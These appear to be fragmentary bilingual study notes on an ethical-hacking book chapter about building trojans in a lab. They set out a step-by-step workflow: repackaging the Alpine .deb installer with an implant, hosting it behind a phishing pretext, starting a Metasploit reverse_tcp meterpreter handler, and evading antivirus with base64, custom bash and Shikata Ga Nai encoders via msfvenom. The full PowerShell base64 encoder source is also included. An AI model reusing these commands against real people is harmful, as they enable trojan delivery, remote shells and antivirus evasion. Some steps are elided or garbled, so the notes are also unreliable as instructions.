Ethical.Hacking.2021.10:BUILDING TROJANS
回顾:metasploitframe 反射过程msfvenom生成代码命令Hiding an Implant in a Legitimate File
回顾:
metasploitframe 反射过程
msfvenom生成代码命令
Hiding an Implant in a Legitimate File
We’ll execute a similar attack here by sending a phishing email
encouraging a victim to download an updated version of the company’s email client,
Alpine, from a fake site. You’ll execute this attack on the Ubuntu desktop machine in
your virtual environment. Let’s begin by creating the Trojan.
We’ll create our trojan by modifying the Alpine installer, the .deb file, so that it
installs the implant as well as Alpine. Download the legitimate Alpine installer by
running the following command:
kali@kali:~/Desktop/Malware/trojans/$ apt-get download alpine
extract the contents of the file to the mailTrojan folder by running the following command:
kali@kali:~/Desktop/Malware/trojans/$ engrampa <Alpine DEB file> -e mailTrojan
Editing Your.deb File
You’ll need to edit the Alpine installer’s .deb installation file so that it includes your
malicious implant, so let’s walk through the installer’s structure. All installation files must
contain a DEBIAN folder, which contains the files that describe the program and how to
install it. The installation file can also contain other folders such as var for files or usr for
binaries. These folders are copied to a location relative to the /home directory during
installation. For example, the installer would copy the usr folder to /home/usr. The
installer then will read the contents of the DEBIAN folder.
Adding the Implant
repackage your files into your final .deb installation file.
Hosting the Trojan(托管特洛伊木马)
kali@kali:~/Desktop/Malware/trojans$ sudo python3 -m http.server 80
Next, you’ll need to start the attacker server that will listen for connections from your
implant.
kali@kali:~$ msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/
x86/meterpreter/reverse_tcp; set LHOST <Kali IP address>; set LPORT
8443; run; exit -y“
Downloading the Infected File
访问:http://<Kali IP address>/mailTrojan.deb 下载安装略
how to design your own backdoor. But if you want to install one now, consider using the dbd backdoor designed by Kyle Barnthouse and available at https://github.com/gitdurandal/dbd/.
Evading Antivirus by Using Encoders
You can see which antivirus software will detect your implant by uploading it to Virus Total at
https://www.virustotal.com/gui/.
Antivirus systems use signature detection to attempt to find malware. A malware’s
signature is a unique sequence of bytes that represents it. You can see our malicious
implant’s byte sequence by running the xxd command:
kali@kali:~/Desktop/Malware$ xxd malicious
Encoders change a program’s signature by modifying its bytes without changing its functionality.
编码器通过修改程序的字节而不改变其功能来更改程序的签名。
启动msf:
sudo msfdb init && msfconsole
msf6 > show encoders
The Base64 Encoder
The powershell_base64 encoder uses the base64 encoding scheme, which converts
binary sequences to text, just like the ASCII encoding scheme mentioned in Chapter 5.
However, unlike ASCII, which converts 8-bit sequences, the base64 encoder converts
6-bit sequences to one of 64 possible printable characters.
converts the Linux ls command from ASCII to base64.
The last section has only four bits, so the remaining two bits are assumed to be 0,
and the padding character (=) is added to the end. Here is the base64encoded result:
bHM=.
we decode it and pass it to the shell
base64 -d <<< bHM= | sh
base64 --help
用法:base64 [选项]... [文件]
使用 Base64 编码/解码文件或标准输入输出。如果没有指定文件,或者文件为"-",则从标准输入读取。
必选参数对长短选项同时适用。
-d, --decode 解码数据
-i, --ignore-garbag 解码时忽略非字母字符
-w, --wrap=字符数 在指定的字符数后自动换行(默认为76),0 为禁用自动换行
举例:
A Bash script containing the ls command will have a different signature from a file
containing base64-encoded values of the base64 -d <<< bHM= | sh command, even though
they are functionally equivalent. This is because both files are stored using ASCII
encoding. Because the signatures are different, an antivirus program may fail to detect
the malicious file containing the base64 values, as described in Figure 10-8
polymorphic 多态的
这个implant.sh在Kali上是不允许连接Telnet的。
Writing a Metasploit Module
参考:
view the cmd/powershell_base64 encoder by visiting
metasploit-framework/powershell_base64.rb at master · rapid7/metasploit-framework · GitHub
This encoder is used to encode PowerShell scripts for Windows machines.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Encoder
Rank = ExcellentRanking
def initialize
super(
'Name' => 'Powershell Base64 Command Encoder',
'Description' => %q{
This encodes the command as a base64 encoded command for powershell.
},
'Author' => 'Ben Campbell',
'Arch' => ARCH_CMD,
'Platform' => 'win')
end
#
# Encodes the payload
#
def encode_block(state, buf)
# Skip encoding for empty badchars
if state.badchars.length == 0
return buf
end
if (state.badchars.include? '-') || (state.badchars.include? ' ')
return buf
end
cmd = encode_buf(buf)
if state.badchars.include? '='
while cmd.include? '='
buf << " "
cmd = encode_buf(buf)
end
end
cmd
end
def encode_buf(buf)
base64 = Rex::Text.encode_base64(Rex::Text.to_unicode("cmd.exe /c start #{buf}"))
cmd = "powershell -w hidden -nop -e #{base64}"
end
end
create a new file called bash_base64.rb inside the Encoders folder.
To test your new encoder, add it to the Metasploit Framework by copying it into the
encoders folder, which you can find by opening your file explorer and navigating to
/usr/share/metasploit-framework/modules/encoders. Create a new folder called bash
and save your bash_base64.rb encoder file here.
Open a new terminal and run the show encoder command in the msfconsole to ensure
that your module was added correctly:
Run the following command to create your encoded implant and save it as
implantEncoded:
kali@kali:~/Desktop/Malware/$ implant.sh | msfvenom --payload --arch x86 --
platform --encoder bash/bash_base64 -o implantEncoded
Test your encoded implant by making it executable and running it:
kali@kali:~/Desktop/Malware/$ chmod +x implantEncoded
kali@kali:~/Desktop/Malware/$ ./implantEncoded
Shikata Ga Nai Encoder
The following command generates an SGN-encoded payload; remember to replace <Kali-IP> with the IP address of your Kali Linux machine:
sudo msfvenom -a x86 --platform linux -p linux/x86/meterpreter/
reverse_tcp LHOST=<Kali IP address> LPORT=443 ➊ --encoder x86/shikata_ga_nai -i 4 -f elf -o malicious
开放原子开发者工作坊旨在鼓励更多人参与开源活动,与志同道合的开发者们相互交流开发经验、分享开发心得、获取前沿技术趋势。工作坊有多种形式的开发者活动,如meetup、训练营等,主打技术交流,干货满满,真诚地邀请各位开发者共同参与!
更多推荐
所有评论(0)